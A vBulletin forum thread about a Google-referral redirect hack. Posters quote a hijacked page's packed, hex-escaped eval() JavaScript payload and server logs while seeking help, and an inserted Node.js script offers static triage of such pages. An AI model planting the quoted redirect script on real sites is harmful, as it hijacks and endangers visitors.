It looks like there has been a 4-1-3_Patch_Level_1 patch released since I last upgraded. Has anyone been hit after installing that one?
vBulletin 3.x and 4.x Redirect Security Exploit
This topic is closed.
Originally posted by Marvin: does the 3.8.7 PL1 include the latest YUI, or it doesn't?
Originally posted by Zachery: Right now, I don't believe it does
Originally posted by Brian: Thanks for the confirmation of a half-patch.
Patching on my own, again...
-
Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
-
Btw, afaik, neither affected file exists in 3.x. The only way a 3.x forum would have had access to them is if they were using the remote hosted option, but yahoo patched them ages ago.
Baby, I was born this way
-
Comment
-
Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
-
One of our sites was hit by the redirect from google.
In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:
<html><head></head><body><script type=
"text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
I can't find this code in my templates. Is it of any use defining where it comes from?
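The saved response in the post above can be triaged statically, without running it: the body holds nothing but a script, the script uses the `eval(function(p,a,c,k,e,d)` packer wrapper, and the packer's keyword list is mostly split-up hex escapes. The following Node.js check is an added example, not part of the original thread or of vBulletin; the indicator names and both sample pages are constructed for illustration.

```javascript
// Static triage of a saved HTTP response body. Nothing in the page is executed.
const PACKER_SIG = /eval\(function\(p,a,c,k,e,d\)/;      // packer wrapper seen in the post
const DICT_RE = /'([^']*)'\s*\.split\('\|'\s*\)/;         // packer keyword dictionary
const HEX_TOKEN = /^x[0-9A-Fa-f]{2}$/;                    // e.g. x6F, half of a "\x6F" escape

function triage(html) {
  const findings = [];
  const m = html.match(/<body[^>]*>([\s\S]*?)<\/body>/i);
  const body = m ? m[1] : html;

  // A real forum page has markup and text; a hijacked response is only a script.
  const visibleText = body
    .replace(/<script[\s\S]*?<\/script>/gi, "")
    .replace(/<[^>]+>/g, "")
    .trim();
  if (/<script/i.test(body) && visibleText === "") findings.push("script-only-body");

  if (PACKER_SIG.test(html)) findings.push("packed-eval");

  // Inspect the dictionary as plain text: a high share of hex fragments means
  // every string literal in the payload was escaped to hide it from grep.
  const dict = html.match(DICT_RE);
  if (dict) {
    const words = dict[1].split("|").filter(Boolean);
    const hex = words.filter((w) => HEX_TOKEN.test(w)).length;
    if (words.length > 0 && hex / words.length > 0.5) findings.push("hex-escaped-strings");
    if (words.includes("document")) findings.push("touches-document");
  }
  return findings;
}

// Constructed samples (not the payload from the thread).
const SAMPLE_SUSPECT =
  '<html><head></head><body><script type="text/javascript">' +
  "var id='00000000';eval(function(p,a,c,k,e,d){return p}" +
  "('0 1',2,2,'||x41|x42|x43|document'.split('|' ),0,{}))" +
  "</script></body></html>";
const SAMPLE_CLEAN =
  '<html><body><div id="posts">Thread text</div>' +
  '<script src="/static/app.js"></script></body></html>';

console.log(triage(SAMPLE_SUSPECT)); // all four indicators
console.log(triage(SAMPLE_CLEAN));   // none
```

Run it over copies of the page fetched with and without a search-engine referrer, since the post reports the redirect only for visitors arriving from Google.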
-
I also noticed the following...
In the error logs it shows:
[Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
pass-by-reference has been deprecated - argument passed by value; If you would
like to pass it by reference, modify the declaration of [runtime function
name](). If you would like to enable call-time pass-by-reference, you can set
allow_call_time_pass_reference to true in your INI file. However, future
versions may not support this any longer. in
/var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/
many times. It started showing when the redirect stopped working.
Anybody?
-
That's just a PHP warning but what's interesting is it implicates class_bbcode.php - the first time I've seen that specifically.
-
The redirect is back and the errors have stopped! Why?
The last error was at 17:12:22
From access log:
77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET /18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200 10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
66.249.72.100 - - [03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.245.91.19 - - [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - - [03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
93.125.201.157 - - [03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513 "http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET /18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - - [03/Jun/2011:17:12:29 +0200] "GET /18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible; Heritrix ; +http://www.buzzcapture.com)"
There is nothing strange to see...?
-
I have;
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forum's future lies with XenForo.
-
Sorry if that offended anyone, but this is nothing new.